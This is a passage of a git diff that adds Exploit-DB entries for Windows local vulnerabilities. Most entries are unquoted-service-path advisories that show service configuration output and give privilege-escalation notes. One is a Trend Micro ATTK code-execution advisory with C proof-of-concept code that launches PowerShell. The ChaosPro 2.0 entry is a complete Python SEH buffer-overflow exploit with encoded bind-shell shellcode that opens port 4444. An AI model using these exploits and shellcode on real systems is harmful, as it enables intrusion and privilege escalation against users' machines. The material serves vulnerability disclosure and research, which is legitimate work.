+14 Aug, 19 : Vendor Response
+18 Sep, 19 : Vendor Fixed
+18 Sep, 19  : Vendor released new patched
\ No newline at end of file
diff --git a/exploits/windows/local/47503.txt b/exploits/windows/local/47503.txt
new file mode 100644
index 000000000..c970fc1d9
--- /dev/null
+++ b/exploits/windows/local/47503.txt
@@ -0,0 +1,22 @@
+# Exploit Title : ActiveFax Server 6.92 Build 0316 - 'ActiveFaxServiceNT' Unquoted Service Path
+# Date : 2019-10-15
+# Exploit Author : Cakes
+# Vendor Homepage: https://www.actfax.com/
+# Software Link :  https://www.actfax.com/download/actfax_setup_x64_ge.exe
+# Version : ActiveFax Server 6.92 Build 0316
+# Tested on Windows 10
+# CVE : N/A 
+
+sc qc ActiveFaxServiceNT
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: ActiveFaxServiceNT
+        TYPE               : 10  WIN32_OWN_PROCESS 
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\ActiveFax\Server\ActSrvNT.exe
+        LOAD_ORDER_GROUP   : 
+        TAG                : 0
+        DISPLAY_NAME       : ActiveFax-Server-Dienst
+        DEPENDENCIES       : 
+        SERVICE_START_NAME : .\Administrator
\ No newline at end of file
diff --git a/exploits/windows/local/47504.txt b/exploits/windows/local/47504.txt
new file mode 100644
index 000000000..ca735fba4
--- /dev/null
+++ b/exploits/windows/local/47504.txt
@@ -0,0 +1,24 @@
+# Lavasoft 2.3.4.7 - 'LavasoftTcpService' Unquoted Service Path
+# Author: Luis MedinaL
+# Date: 2019-10-15
+# Vendor Homepage: https://www.adaware.com/
+# Software Link : https://www.adaware.com/antivirus
+# Version : 2.3.4.7
+# Tested on:  Microsoft Windows 10 Pro x64 ESP
+
+# Description:
+# Lavasoft 2.3.4.7 installs LavasoftTcpService as a service with an unquoted service path
+
+C:\Users\Luis ML>sc qc LavasoftTcpService
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: LavasoftTcpService
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : LavasoftTcpService
+        DEPENDENCIAS       : RPCSS
+        NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/47506.txt b/exploits/windows/local/47506.txt
new file mode 100644
index 000000000..2837e24c9
--- /dev/null
+++ b/exploits/windows/local/47506.txt
@@ -0,0 +1,23 @@
+# Exploit Title : Zilab Remote Console Server 3.2.9 - 'zrcs' Unquoted Service Path
+# Date : 2019-10-15
+# Exploit Author : Cakes
+# Vendor: Zilab Software Inc
+# Version : Zilab Remote Console Server 3.2.9
+# Software: http://html.tucows.com/preview/340137/Zilab-Remote-Console-Server?q=remote+support
+# Tested on Windows 10
+# CVE : N/A 
+
+
+C:\Users\Administrator>sc qc zrcs
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: zrcs
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 0   IGNORE
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Zilab\ZRCS\ZRCS.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Zilab Remote Console Server
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/47508.txt b/exploits/windows/local/47508.txt
new file mode 100644
index 000000000..45e551cb7
--- /dev/null
+++ b/exploits/windows/local/47508.txt
@@ -0,0 +1,22 @@
+# Exploit Title : LiteManager 4.5.0 - 'romservice' Unquoted Serive Path
+# Date : 2019-10-15
+# Exploit Author : Cakes
+# Vendor: LiteManager Team
+# Version : LiteManager 4.5.0
+# Software: http://html.tucows.com/preview/1594042/LiteManager-Free?q=remote+support
+# Tested on Windows 10
+# CVE : N/A 
+     
+c:\>sc qc romservice
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: romservice
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\LiteManagerFree - Server\ROMServer.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : LiteManagerTeam LiteManager
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/47510.txt b/exploits/windows/local/47510.txt
new file mode 100644
index 000000000..994aa1c24
--- /dev/null
+++ b/exploits/windows/local/47510.txt
@@ -0,0 +1,23 @@
+# Exploit Title : Mikogo 5.2.2.150317 - 'Mikogo-Service' Unquoted Serive Path
+# Date : 2019-10-15
+# Exploit Author : Cakes
+# Vendor: LiteManager Team
+# Version : LiteManager 4.5.0
+# Software: http://html.tucows.com/preview/518015/Mikogo?q=remote+support
+# Tested on Windows 10
+# CVE : N/A 
+
+
+c:\>sc qc Mikogo-Service
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: Mikogo-Service
+        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Users\Administrator\AppData\Roaming\Mikogo\Mikogo-Service.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Mikogo-Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/47521.txt b/exploits/windows/local/47521.txt
new file mode 100644
index 000000000..900a3edf8
--- /dev/null
+++ b/exploits/windows/local/47521.txt
@@ -0,0 +1,42 @@
+# Exploit Title: BlackMoon FTP Server 3.1.2.1731 - 'BMFTP-RELEASE' Unquoted Serive Path 
+# Exploit Author: Debashis Pal
+# Date: 2019-10-17
+# Vendor : Blackmoonftpserver
+# Source: http://www.tucows.com/preview/222822/BlackMoon-FTP-Server?q=FTP+server
+# Version: BlackMoon FTP Server 3.1.2.1731
+# CVE : N/A
+# Tested on: Windows 7 SP1(64bit), Windows 7 SP1(32bit)
+
+1. Description:
+Unquoted service paths in BlackMoon FTP Server versions 3.1.2.1731 'BMFTP-RELEASE' have an unquoted service path.
+
+2. PoC:
+
+C:\>sc qc BMFTP-RELEASE
+sc qc BMFTP-RELEASE
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: BMFTP-RELEASE
+        TYPE               : 10  WIN32_OWN_PROCESS 
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Selom Ofori\BlackMoon FTP Server\FTPService.exe
+        LOAD_ORDER_GROUP   : 
+        TAG                : 0
+        DISPLAY_NAME       : BlackMoon FTP Service
+        DEPENDENCIES       : 
+        SERVICE_START_NAME : LocalSystem
+
+
+3. Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot.
+If successful, the local user's code would execute with the elevated privileges of the application.
+
+
+
+# Disclaimer
+=============
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
+The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
\ No newline at end of file
diff --git a/exploits/windows/local/47522.txt b/exploits/windows/local/47522.txt
new file mode 100644
index 000000000..5d71f1854
--- /dev/null
+++ b/exploits/windows/local/47522.txt
@@ -0,0 +1,39 @@
+# Exploit Title: Web Companion versions 5.1.1035.1047 - 'WCAssistantService' Unquoted Service Path
+# Exploit Author: Debashis Pal
+# Date: 2019-10-17
+# Vendor Homepage : https://webcompanion.com
+# Source: https://webcompanion.com
+# Version: Web Companion versions 5.1.1035.1047
+# CVE : N/A
+# Tested on: Windows 7 SP1(64bit)
+
+1. Description:
+Web Companion versions 5.1.1035.1047 service 'WCAssistantService' have an unquoted service path.
+
+2. PoC:
+
+C:\>sc qc WCAssistantService
+sc qc WCAssistantService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: WCAssistantService
+        TYPE               : 10  WIN32_OWN_PROCESS 
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
+        LOAD_ORDER_GROUP   : 
+        TAG                : 0
+        DISPLAY_NAME       : WC Assistant
+        DEPENDENCIES       : 
+        SERVICE_START_NAME : LocalSystem
+
+
+3. Exploit:
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot.
+If successful, the local user's code would execute with the elevated privileges of the application.
+
+# Disclaimer
+=============
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
+The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
\ No newline at end of file
diff --git a/exploits/windows/local/47523.txt b/exploits/windows/local/47523.txt
new file mode 100644
index 000000000..214dac991
--- /dev/null
+++ b/exploits/windows/local/47523.txt
@@ -0,0 +1,23 @@
+# Exploit Title : WorkgroupMail 7.5.1 - 'WorkgroupMail' Unquoted Service Path
+# Date : 2019-10-15
+# Exploit Author : Cakes
+# Vendor: Softalk
+# Version : 7.5.1
+# Software: http://html.tucows.com/preview/195580/WorkgroupMail-Mail-Server?q=pop3
+# Tested on Windows 10
+# CVE : N/A 
+
+
+c:\>sc qc WorkgroupMail
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: WorkgroupMail
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\WorkgroupMail\wmsvc.exe -s
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : WorkgroupMail
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/47527.txt b/exploits/windows/local/47527.txt
new file mode 100644
index 000000000..b259c12f0
--- /dev/null
+++ b/exploits/windows/local/47527.txt
@@ -0,0 +1,112 @@
+# Exploit Title: Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution
+# Date: 2019-10-19
+# Exploit Author: hyp3rlinx
+# Vendor Homepage: www.trendmicro.com
+# Version: 1.62.0.1218 and below
+# Tested on: Microsoft Windows
+# CVE: N/A
+
+
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-ANTI-THREAT-TOOLKIT-(ATTK)-REMOTE-CODE-EXECUTION.txt
+[+] ISR: Apparition Security          
+ 
+
+[Vendor]
+www.trendmicro.com
+
+
+[Product]
+Trend Micro Anti-Threat Toolkit (ATTK)
+1.62.0.1218 and below
+
+Trend Micro Anti-Threat Toolkit (ATTK) can analyze malware issues and clean infections.
+It can be used to perform system forensic scans and clean the following infection types:
+
+General malware infection
+Master boot record Infection
+CIDOX/ RODNIX infection
+Rootkit infection
+Zbot infection
+Cryptolocker infection
+etc..
+
+
+[Vulnerability Type]
+Remote Code Execution
+
+
+[CVE Reference]
+CVE-2019-9491
+
+
+[Security Issue]
+Trend Micro Anti-Threat Toolkit (ATTK) will load and execute arbitrary .EXE files if a malware author
+happens to use the vulnerable naming convention of "cmd.exe" or "regedit.exe" and the malware can be
+placed in the vacinity of the ATTK when a scan is launched by the end user.
+
+Since the ATTK is signed by verified publisher and therefore assumed trusted any MOTW security warnings
+are bypassed if the malware was internet downloaded, also it can become a persistence mechanism as
+each time the Anti-Threat Toolkit is run so can an attackers malware.
+
+Standalone affected components of ATTK and other integrations (e.g. WCRY Patch Tool, OfficeScan Toolbox, etc.)
+
+attk_collector_cli_x64.exe 
+Hash: e8503e9897fd56eac0ce3c3f6db24fb1
+
+TrendMicroRansomwareCollector64.r09.exe
+Hash: 798039027bb4363dcfd264c14267375f
+
+attk_ScanCleanOnline_gui_x64.exe
+Hash: f1d2ca4b14368911c767873cdbc194ed
+
+
+[References]
+https://success.trendmicro.com/solution/000149878
+*All versions of the ATTK have been updated with the newer version. Anti-Threat Toolkit (ATTK) 1.62.0.1223
+
+
+[Exploit/POC]
+Compile an .EXE using below "C" code and use naming convention of "cmd.exe" or "regedit.exe".
+Run the Anti-Threat Toolkit and watch the ATTK console to see the Trojan file get loaded and executed.
+
+#include <windows.h>
+
+void main(void){
+   puts("Trend Micro Anti-Threat Toolkit PWNED!");
+   puts("Discovery: hyp3rlinx");
+   puts("CVE-2019-9491\n");
+   WinExec("powershell", 0);
+}
+
+
+[POC Video URL]
+https://www.youtube.com/watch?v=HBrRVe8WCHs
+
+
+[Network Access]
+Remote
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: September 9, 2019
+Vendor confirms vulnerability: September 25, 2019
+Vendor requests to coordinate advisory: September 25, 2019
+October 19, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows/local/47538.txt b/exploits/windows/local/47538.txt
new file mode 100644
index 000000000..19a32d253
--- /dev/null
+++ b/exploits/windows/local/47538.txt
@@ -0,0 +1,38 @@
+# Title: IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path
+# Author: Sainadh Jamalpur
+# Date: 2019-10-22
+# Vendor Homepage: https://www.iobit.com
+# Software Link: https://www.iobit.com/en/advanceduninstaller.php
+# Version : 9.1.0.8
+# Tested on: Windows 10 64bit(EN)
+# CVE : N/A
+
+# 1. Description:
+# Unquoted service paths in IObit Uninstaller v9.1.0.8 have an unquoted service path.
+
+# PoC
+===========
+C:\>sc qc IObitUnSvr
+[SC] QueryServiceConfig SUCCESS
+SERVICE_NAME: IObitUnSvr
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 0   IGNORE
+        BINARY_PATH_NAME   : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : IObit Uninstaller Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\>
+
+#Exploit:
+============
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
+
+# Disclaimer
+=============
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
+The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
\ No newline at end of file
diff --git a/exploits/windows/local/47549.txt b/exploits/windows/local/47549.txt
new file mode 100644
index 000000000..b4cfa1237
--- /dev/null
+++ b/exploits/windows/local/47549.txt
@@ -0,0 +1,38 @@
+# Exploit Title: JumpStart 0.6.0.0 - 'jswpbapi' Unquoted Service Path
+# Google Dork: N/A
+# Date: 2019-09-09
+# Exploit Author: Roberto Escamilla
+# Vendor Homepage:https://www.inforprograma.net/
+# Software Link: https://www.inforprograma.net/
+# Version:  = 0.6.0.0 wpspin.exe
+# Tested on: Windows 10 Home
+# CVE : N/A
+
+###############STEPS##########################
+
+# 1.- Install the JumpStart application on Windows 10 Home Operating System
+# 2.- Open our "System Symbol" application.
+# 3.- Execute the command -------wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+# 4.- The following will appear in a list: JumpStart Push-Button Service      jswpbapi     C:\Program Files (x86)\Jumpstart\jswpbapi.exe
+# 5.- We proceed to verify the process using the command icacls, with which we verify the protection of the directory as shown below:
+
+NT AUTHORITY\SYSTEM:(I)(F)
+BUILTIN\Administradores:(I)(F)
+BUILTIN\Usuarios:(I)(RX)
+ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIONES:(I)(RX)
+ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIÓN RESTRINGIDOS:(I)(RX)
+
+# 6.- Finally we verify using the command sc qc jswpbapi the protection of the service in which we observe that it is scalable in privileges 
+# since the route contains spaces without being in quotes and is in CONTROL_ERROR normal and NOMBRE_INICIO_SERVICIO: 
+# LocalSystem as it's shown in the following [SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: jswpbapi
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Jumpstart\jswpbapi.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : JumpStart Push-Button Service
+        DEPENDENCIAS       : RPCSS
+        NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/47551.py b/exploits/windows/local/47551.py
new file mode 100755
index 000000000..a8f98c85b
--- /dev/null
+++ b/exploits/windows/local/47551.py
@@ -0,0 +1,176 @@
+# Exploit Title: ChaosPro 2.0 - Buffer Overflow (SEH)
+# Date: 2019-10-27
+# Exploit Author: Chase Hatch (SYANiDE)
+# Vendor Homepage: http://www.chaospro.de/
+# Software link: http://www.chaospro.de/cpro20.zip
+# Version: 2.0
+# Tested on: Windows XP Pro OEM
+
+#!/usr/bin/env python2
+import os, sys
+
+
+# sploit = "A"* 5000  ## Crash! 41414141 in SEH! via ProfilePath or PicturePath.  Windows XP OEM
+# `locate pattern_create.rb | head -n 1` 5000  #  326d4431
+# `locate pattern_offset.rb | head -n 1` 326d4431 5000  #  2705
+# sploit = "A" * (2705 -  4 - 126)  # 2575
+# sploit = (pattern_create) # `locate pattern_create.rb|head -n 1` 2575 # 0012F51C dump is 61354161, or 61413561 in LE
+# `locate pattern_offset.rb|head -n 1` 61413561 2575
+# 16
+
+
+################ Second stage ####################
+sploit = "A"*16
+#  msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUNC=seh 
+#, BufferRegister=ESP -b "\x00" -e x86/alpha_mixed -i 1 -f c
+sploit += (
+"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
+"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
+"\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x6b\x58\x6e\x62\x77\x70"
+"\x75\x50\x57\x70\x71\x70\x6c\x49\x68\x65\x44\x71\x4b\x70\x50"
+"\x64\x4e\x6b\x52\x70\x36\x50\x4c\x4b\x36\x32\x66\x6c\x4e\x6b"
+"\x62\x72\x54\x54\x6e\x6b\x72\x52\x34\x68\x54\x4f\x6d\x67\x50"
+"\x4a\x31\x36\x30\x31\x6b\x4f\x6c\x6c\x55\x6c\x71\x71\x31\x6c"
+"\x53\x32\x76\x4c\x67\x50\x7a\x61\x48\x4f\x56\x6d\x33\x31\x6b"
+"\x77\x58\x62\x4a\x52\x61\x42\x56\x37\x6e\x6b\x52\x72\x52\x30"
+"\x4c\x4b\x71\x5a\x37\x4c\x4e\x6b\x32\x6c\x52\x31\x50\x78\x4b"
+"\x53\x37\x38\x75\x51\x68\x51\x62\x71\x4c\x4b\x46\x39\x45\x70"
+"\x53\x31\x68\x53\x4c\x4b\x51\x59\x64\x58\x4b\x53\x64\x7a\x63"
+"\x79\x6c\x4b\x34\x74\x4c\x4b\x33\x31\x6b\x66\x36\x51\x49\x6f"
+"\x6c\x6c\x7a\x61\x58\x4f\x64\x4d\x67\x71\x68\x47\x70\x38\x4b"
+"\x50\x64\x35\x68\x76\x54\x43\x43\x4d\x58\x78\x67\x4b\x33\x4d"
+"\x56\x44\x72\x55\x79\x74\x43\x68\x4c\x4b\x50\x58\x46\x44\x77"
+"\x71\x58\x53\x65\x36\x4e\x6b\x44\x4c\x62\x6b\x4c\x4b\x32\x78"
+"\x45\x4c\x33\x31\x6a\x73\x6c\x4b\x53\x34\x6e\x6b\x46\x61\x7a"
+"\x70\x4b\x39\x72\x64\x57\x54\x61\x34\x51\x4b\x51\x4b\x35\x31"
+"\x31\x49\x71\x4a\x32\x71\x69\x6f\x69\x70\x73\x6f\x61\x4f\x52"
+"\x7a\x4c\x4b\x65\x42\x4a\x4b\x6e\x6d\x53\x6d\x65\x38\x75\x63"
+"\x35\x62\x67\x70\x45\x50\x51\x78\x70\x77\x71\x63\x55\x62\x43"
+"\x6f\x31\x44\x45\x38\x52\x6c\x43\x47\x65\x76\x43\x37\x49\x6f"
+"\x58\x55\x68\x38\x6c\x50\x43\x31\x67\x70\x73\x30\x55\x79\x6f"
+"\x34\x53\x64\x66\x30\x61\x78\x37\x59\x6b\x30\x52\x4b\x73\x30"
+"\x49\x6f\x39\x45\x52\x4a\x53\x38\x51\x49\x46\x30\x39\x72\x49"
+"\x6d\x67\x30\x42\x70\x71\x50\x66\x30\x63\x58\x48\x6a\x44\x4f"
+"\x39\x4f\x59\x70\x4b\x4f\x4b\x65\x4e\x77\x51\x78\x37\x72\x73"
+"\x30\x47\x61\x43\x6c\x6c\x49\x38\x66\x72\x4a\x76\x70\x52\x76"
+"\x42\x77\x33\x58\x4b\x72\x69\x4b\x47\x47\x35\x37\x69\x6f\x5a"
+"\x75\x63\x67\x31\x78\x6f\x47\x59\x79\x50\x38\x79\x6f\x59\x6f"
+"\x6e\x35\x71\x47\x42\x48\x50\x74\x68\x6c\x47\x4b\x39\x71\x6b"
+"\x4f\x49\x45\x73\x67\x4e\x77\x31\x78\x50\x75\x72\x4e\x62\x6d"
+"\x61\x71\x49\x6f\x58\x55\x65\x38\x51\x73\x70\x6d\x33\x54\x47"
+"\x70\x6b\x39\x7a\x43\x73\x67\x72\x77\x53\x67\x45\x61\x6a\x56"
+"\x30\x6a\x32\x32\x46\x39\x51\x46\x6d\x32\x4b\x4d\x62\x46\x58"
+"\x47\x61\x54\x47\x54\x57\x4c\x36\x61\x53\x31\x6c\x4d\x50\x44"
+"\x44\x64\x56\x70\x69\x56\x57\x70\x53\x74\x71\x44\x62\x70\x42"
+"\x76\x51\x46\x76\x36\x77\x36\x56\x36\x42\x6e\x36\x36\x50\x56"
+"\x30\x53\x42\x76\x42\x48\x42\x59\x58\x4c\x37\x4f\x4b\x36\x69"
+"\x6f\x59\x45\x4b\x39\x6b\x50\x42\x6e\x62\x76\x47\x36\x59\x6f"
+"\x54\x70\x62\x48\x56\x68\x6d\x57\x65\x4d\x31\x70\x59\x6f\x7a"
+"\x75\x6d\x6b\x49\x6e\x66\x6e\x75\x62\x39\x7a\x71\x78\x6e\x46"
+"\x4a\x35\x4d\x6d\x6d\x4d\x79\x6f\x38\x55\x65\x6c\x57\x76\x31"
+"\x6c\x47\x7a\x4d\x50\x79\x6b\x59\x70\x52\x55\x63\x35\x6f\x4b"
+"\x31\x57\x37\x63\x44\x32\x42\x4f\x70\x6a\x35\x50\x51\x43\x69"
+"\x6f\x39\x45\x41\x41"
+) # 710 bytes
+sploit += "A" * (2575 - 16 - 710)
+
+
+################ First stage ####################
+
+# ESP: 0012E75C
+# ESP target: 0012FF98
+## Need to align to four-byte and 16-byte boundaries:
+# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /16" |bc
+# 282.0000
+# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /4" |bc
+# 1551.0000
+# echo "ibase=16; obase=10; 0012FF98 - 0012E75C" |bc
+# 183C
+# 0012FF32   54               PUSH ESP
+# 0012FF33   58               POP EAX
+# 0012FF34   66:05 3C18       ADD AX,183C
+# 0012FF38   50               PUSH EAX
+# 0012FF39   5C               POP ESP
+sploit += "\x54\x58\x66\x05\x3c\x18\x50\x5c" # 8
+
+
+# target instruction to push onto stack at new ESP:  FFE4 JMP ESP # 4141E4FF
+# ./calc_target2.py 4141E4FF 0 7f7f017f 0101017f 3e3e1803
+#    0:	25 28 28 28 28       	and    eax,0x28282828
+#    5:	25 47 47 47 47       	and    eax,0x47474747
+#    a:	2d 7f 01 7f 7f       	sub    eax,0x7f7f017f
+#    f:	2d 7f 01 01 01       	sub    eax,0x101017f
+#   14:	2d 03 18 3e 3e       	sub    eax,0x3e3e1803
+#   19:	50                   	push   eax
+sploit += (
+	"\x25\x28\x28\x28\x28"
+	"\x25\x47\x47\x47\x47"
+	"\x2d\x7f\x01\x7f\x7f"
+	"\x2d\x7f\x01\x01\x01"
+	"\x2d\x03\x18\x3e\x3e"
+	"\x50"
+) # 26 bytes
+
+## Realign new ESP with beginning of overflow buffer:
+## New ESP should be four-byte and 16-byte aligned:
+# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 16" |bc
+# 122.0000
+# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 4" |bc
+# 671.0000
+# echo "ibase=16; obase=10;0012FF98 - 0012F51C" |bc
+# A7C
+## Need to adjust ESP down the stack past the JMP ESP, so push/pop ahead of the JMP ESP we're trying to sled into (keep the sled clean)
+# 0012FF54   44               INC ESP
+# 0012FF55   44               INC ESP
+# 0012FF56   44               INC ESP
+# 0012FF57   44               INC ESP
+# 0012FF58   44               INC ESP
+# 0012FF59   44               INC ESP
+# 0012FF5A   44               INC ESP
+# 0012FF5B   44               INC ESP
+sploit += "\x44\x44\x44\x44\x44\x44\x44\x44" # 8
+
+## Going to have to carve out the address 0012F51C
+# ./calc_target2.py 0012F51C 0 7f7f017f 61010101 1f6d0864
+#   0:	25 02 02 02 02       	and    eax,0x2020202
+#   5:	25 51 51 51 51       	and    eax,0x51515151
+#   a:	2d 7f 01 7f 7f       	sub    eax,0x7f7f017f
+#   f:	2d 01 01 01 61       	sub    eax,0x61010101
+#  14:	2d 64 08 6d 1f       	sub    eax,0x1f6d0864
+#  19:	50                   	push   eax
+sploit +=(
+	"\x25\x02\x02\x02\x02"
+	"\x25\x51\x51\x51\x51"
+	"\x2d\x7f\x01\x7f\x7f"
+	"\x2d\x01\x01\x01\x61"
+	"\x2d\x64\x08\x6d\x1f"
+	"\x50"
+) # 26 bytes
+
+## Finally, set ESP for the alpha_mixed BufferRegister + JMP ESP
+# 5C   POP ESP
+sploit += "\x5c" # 1
+
+sploit += "A" * (126 - 8 - 26 - 8 - 26 - 1)
+
+################ RET from SEH: JMP SHORT - 126 ####################
+
+sploit += "\xeb\x80" + "\x41\x41" # 4
+# 00401B44  |. 5F             POP EDI
+# 00401B45  |> 5E             POP ESI
+# 00401B46  \. C3             RETN
+sploit += "\x44\x1b\x40\x00"
+
+
+################ build the config ####################
+## Running from just outside base directory of ChaosPro:
+
+def ret_cfg(inp):
+	# do it live in PicturePath
+	cfg = """PicturePath %s""" % inp
+	with open("chaospro\\ChaosPro.cfg",'w') as F:
+		F.write(cfg)
+		F.close()
+
+ret_cfg(sploit)
\ No newline at end of file
diff --git a/exploits/windows/local/47556.txt b/exploits/windows/local/47556.txt
new file mode 100644
index 000000000..739b9ccad
--- /dev/null
+++ b/exploits/windows/local/47556.txt
@@ -0,0 +1,49 @@
+# Exploit Title: Intelligent Security System SecurOS Enterprise 10.2 - 'SecurosCtrlService' Unquoted Service Path
+# Discovery Date: 2019-10-28
+# Exploit Author: Alberto Vargas
+# Vendor Homepage: https://www.issivs.com/product-detail/secure-os-enterprise/
+# Software Link: https://www.issivs.com/schedule-a-free-demo/(trial version for unlicensed users)
+# Version: 10.2 R1
+# Tested on: Windows 10 Pro x64 Esp
+
+# Version: 10.0.18362
+
+# Schedule A Free Demo - ISS - Intelligent Security Systems<https://www.issivs.com/schedule-a-free-demo/>
+# Schedule a Free Demo A leading developer of security surveillance and control systems for 
+# networked digital video and audio recording, video image pattern processing and digital data transmission.
+# www.issivs.com
+
+# Summary: ISS’ global standard for video management, access control and video analytics, SecurOS™ Enterprise is perfectly suited for 
+# managing large and demanding installations. The Enterprise framework can manage and monitor an unlimited number of cameras and devices, apply 
+# intelligent video analytics, and act as an integration platform for a variety of 3rd party systems. Built to handle enterprise level deployments, 
+# SecurOS Enterprise, comes with built-in Native Failure functionality, Microsoft Active Directory / LDAP integration, and has an extensive set 
+# of Cybersecurity features making it one of the most reliable and secure video management platforms in the market today. SecurOS Enterprise 
+# supports all the features of the other 3 editions.
+
+# Description:    The application suffers from an unquoted search path issue impacting the service 'SecurosCtrlService'. This could potentially allow an 
+# authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require 
+# the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could 
+# potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges
